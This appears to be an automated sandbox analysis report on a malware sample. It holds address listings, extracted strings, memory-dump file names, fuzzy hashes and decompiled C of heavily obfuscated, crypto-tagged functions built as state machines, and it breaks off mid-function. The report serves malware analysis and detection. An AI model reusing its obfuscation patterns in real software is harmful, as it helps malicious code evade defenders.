0x002120a8
0x002120b0
0x002120b8
0x002120c0
0x002120c8
0x002120d0
0x002120db
0x002120e3
0x002120ee
0x00212100
0x00212103
0x0021210a
0x00212115
0x00212120
0x0021212d
0x00212138
0x00212140
0x00212145
0x0021214a
0x00212152
0x0021215a
0x0021215f
0x00212167
0x0021216f
0x0021217a
0x00212182
0x0021218d
0x00212198
0x002121a0
0x002121ab
0x002121b6
0x002121be
0x002121c6
0x002121ce
0x002121d6
0x002121de
0x002121e6
0x002121eb
0x002121f3
0x002121fb
0x00212203
0x0021220b
0x00212213
0x0021221b
0x00212223
0x0021222e
0x00212243
0x00212246
0x0021224d
0x00212258
0x00212268
0x0021226c
0x00212274
0x0021227c
0x00212284
0x0021228c
0x00212291
0x00212299
0x002122a1
0x002122a9
0x002122b2
0x002122b7
0x002122bd
0x002122c5
0x002122cd
0x002122d5
0x002122da
0x002122e7
0x002122e8
0x002122ec
0x002122f4
0x00212308
0x0021230f
0x0021231a
0x00212325
0x00212330
0x0021233b
0x00212343
0x0021234b
0x00212360
0x00212365
0x0021236b
0x00212373
0x0021237b
0x00212388
0x0021238b
0x0021238f
0x00212394
0x0021239c
0x002123a4
0x002123ac
0x002123b4
0x002123bc
0x002123c7
0x002123cf
0x002123da
0x002123ed
0x002123f4
0x002123ff
0x00212407
0x0021240f
0x00212417
0x0021241f
0x00212427
0x0021242f
0x00212437
0x0021243f
0x00212447
0x00212457
0x0021245b
0x00212467
0x0021246a
0x0021246e
0x00212476
0x00212481
0x0021248c
0x00212497
0x002124a2
0x002124ad
0x002124b8
0x002124c3
0x002124ce
0x002124d9
0x002124e1
0x002124e6
0x002124ee
0x002124f6
0x002124f6
0x002124fe
0x002124fe
0x002124fe
0x002124fe
0x00212504
0x00000000
0x00000000
0x0021250a
0x00212686
0x00212687
0x002126a7
0x002126b1
0x002126b4
0x002126b9
0x002126c0
0x002126c8
0x00000000
0x00212510
0x00212516
0x00212620
0x00212644
0x00212657
0x00212669
0x0021266f
0x00212677
0x00212679
0x0021267e
0x00000000
0x0021251c
0x00212522
0x002125f6
0x002125fa
0x002125fb
0x00212600
0x00212606
0x00212609
0x0021260f
0x00000000
0x0021260f
0x00212528
0x0021252a
0x002125cf
0x002125d5
0x002125d8
0x002125dd
0x002125e0
0x00000000
0x00212530
0x00212536
0x002125a0
0x002125a5
0x002125a6
0x002125aa
0x002125af
0x002125b2
0x00000000
0x00212538
0x0021253e
0x00000000
0x00212544
0x00212567
0x0021256d
0x0021256d
0x00212573
0x00212578
0x0021257d
0x0021282d
0x00212583
0x00212583
0x00000000
0x00212583
0x0021257d
0x0021253e
0x00212536
0x0021252a
0x00212522
0x00212516
0x00212721
0x0021272d
0x0021272d
0x002126d9
0x002127fb
0x00212802
0x00212807
0x0021280c
0x00212818
0x00000000
0x0021280e
0x0021280e
0x00000000
0x0021280e
0x002126df
0x002126e5
0x00212796
0x0021279b
0x0021279c
0x002127a0
0x002127a5
0x002127a8
0x00000000
0x002126eb
0x002126f1
0x00212744
0x0021275b
0x00212761
0x00212764
0x00212769
0x00212770
0x00212778
0x00000000
0x002126f3
0x002126f9
0x00000000
0x002126ff
0x0021271a
0x00212720
0x002126f9
0x002126f1
0x002126e5
0x00000000
0x0021281a
0x0021281a
0x00000000

Strings

@, xrefs: 00211F3B
jT#, xrefs: 0021224D
HW, xrefs: 00212407
HT3=, xrefs: 0021221B
i<, xrefs: 00212223
T1u:, xrefs: 002120C8
!C, xrefs: 0021233B
?h, xrefs: 00211F7C
Cta, xrefs: 0021212D
t<, xrefs: 0021201F
0, xrefs: 002124B8
D9, xrefs: 00212373
3U, xrefs: 00211EDE
[, xrefs: 002122F4
uG$, xrefs: 002123A4

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$jT#$t<$0$@$uG$
API String ID: 0-3043381779
Opcode ID: 2df1b6fff81d7d2d3d8aa5f0769a7a72aad37b0b53d7e91b6f3a52b5111919bf
Instruction ID: 80a6144eae5ce6773f2c376fa34a40ff889e7b3f75a1b39d9620aca6db0ac4cc
Opcode Fuzzy Hash: 2df1b6fff81d7d2d3d8aa5f0769a7a72aad37b0b53d7e91b6f3a52b5111919bf
Instruction Fuzzy Hash: 4F424472508381DFE378CF25C98AA9BBBE1BBC4704F10891DE5D9962A0D7B58859CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0022511B, Relevance: 17.9, Strings: 14, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0022511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E00222674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E00228C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E00218736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0x22c7a0);
					_push(_v208);
					E00217F4B(_t521, E0022878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E00222025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E0021EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E0021B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E0021EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E0021B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0x22c710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E002111C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0022878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E00222025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}

0x0022511b
0x0022511b
0x00225125
0x0022512c
0x00225133
0x0022513b
0x00225146
0x0022514e
0x00225156
0x0022515e
0x00225163
0x0022516b
0x00225176
0x0022517e
0x00225189
0x00225191
0x00225196
0x0022519e
0x002251a6
0x002251ae
0x002251b6
0x002251be
0x002251c3
0x002251cb
0x002251d0
0x002251d8
0x002251e0
0x002251e9
0x002251f2
0x002251f7
0x002251fd
0x00225205
0x00225218
0x0022521b
0x0022521e
0x00225225
0x00225230
0x00225238
0x00225240
0x00225248
0x00225250
0x00225258
0x00225260
0x00225265
0x0022526d
0x00225275
0x00225280
0x00225288
0x00225293
0x002252a0
0x002252a4
0x002252b1
0x002252b5
0x002252bd
0x002252c8
0x002252d3
0x002252de
0x002252e6
0x002252f0
0x002252f4
0x002252fc
0x00225306
0x00225312
0x00225317
0x0022531d
0x00225322
0x0022532a
0x00225332
0x0022533a
0x0022533f
0x00225344
0x0022534c
0x00225354
0x0022535c
0x00225361
0x00225369
0x00225371
0x00225379
0x00225381
0x0022538b
0x0022538e
0x00225392
0x0022539a
0x002253a5
0x002253b0
0x002253bb
0x002253c6
0x002253ce
0x002253d9
0x002253e4
0x002253ec
0x002253f7
0x002253ff
0x00225407
0x0022540f
0x00225417
0x0022541f
0x00225427
0x0022542f
0x0022543c
0x00225440
0x00225445
0x0022544d
0x00225455
0x0022545d
0x00225465
0x0022546d
0x00225475
0x00225480
0x00225488
0x00225493
0x0022549b
0x002254a3
0x002254b0
0x002254b4
0x002254bc
0x002254c8
0x002254cd
0x002254d3
0x002254db
0x002254e3
0x002254eb
0x002254f4
0x002254f7
0x002254fb
0x00225503
0x0022550b
0x00225513
0x0022551b
0x00225525
0x00225530
0x00225538
0x00225543
0x0022554e
0x00225559
0x00225564
0x00225573
0x0022557a
0x0022557e
0x00225586
0x0022558e
0x0022559b
0x0022559f
0x002255a7
0x002255af
0x002255bc
0x002255c8
0x002255cf
0x002255d3
0x002255db
0x002255e3
0x002255eb
0x002255f3
0x002255fb
0x00225603
0x00225619
0x00225620
0x0022562b
0x0022563e
0x00225641
0x00225648
0x00225653
0x0022565e
0x00225666
0x00225671
0x00225687
0x0022568e
0x00225699
0x002256a1
0x002256ad
0x002256b0
0x002256b7
0x002256bb
0x002256c3
0x002256d6
0x002256dd
0x002256e8
0x002256f0
0x002256f8
0x00225700
0x00225708
0x00225710
0x00225722
0x00225848
0x0022584d
0x00225854
0x00225857
0x0022585c
0x00000000
0x0022585c
0x0022572e
0x00225817
0x00225821
0x00000000
0x00225821
0x0022573a
0x00225806
0x0022580d
0x002257ea
0x002257ea
0x00000000
0x002257ea
0x00225746
0x002257c7
0x002257c8
0x002257d1
0x002257d3
0x002257d8
0x002257da
0x00225998
0x00225998
0x00000000
0x00225998
0x002257e3
0x002257e8
0x002257e8
0x00000000
0x002257e8
0x00225748
0x0022574e
0x0022598c
0x0022598c
0x00225992
0x00000000
0x00000000
0x00000000
0x00225992
0x00225754
0x00225759
0x00225792
0x002257ab
0x00000000
0x002257b5
0x002258a2
0x002258a7
0x002258b0
0x002258c3
0x002258ef
0x002258f4
0x002258f9
0x002258fe
0x00225913
0x0022596b
0x0022596b
0x00225978
0x0022597d
0x00225984
0x00225987
0x00000000

Strings

OD, xrefs: 0022562B
'v, xrefs: 00225417
t:, xrefs: 00225488
p!,, xrefs: 00225708
r{, xrefs: 00225275
y5, xrefs: 00225493
|uQa, xrefs: 002251D0
pv, xrefs: 002258B0
c, xrefs: 002256DD
*T, xrefs: 002253F7
0), xrefs: 00225189
o^, xrefs: 00225465
=i, xrefs: 0022568E
%, xrefs: 00225293

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
API String ID: 0-2620103065
Opcode ID: db92bd3c09c8960166b1b55a54f582a389ce2282a2aa5695e06469a525566461
Instruction ID: 394a243f78e0c0819a21badce082717cddee9411a472bdd87e5ebaacab761d34
Opcode Fuzzy Hash: db92bd3c09c8960166b1b55a54f582a389ce2282a2aa5695e06469a525566461
Instruction Fuzzy Hash: FA222371508380DFE364CF25C98AA8BFBE1BBC4748F108A1DE5D9962A1D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00214A35, Relevance: 16.7, Strings: 13, Instructions: 468
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00214A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E00226D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E0021F536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E0021F536(_v1644, _v1772, _v1612, _t508);
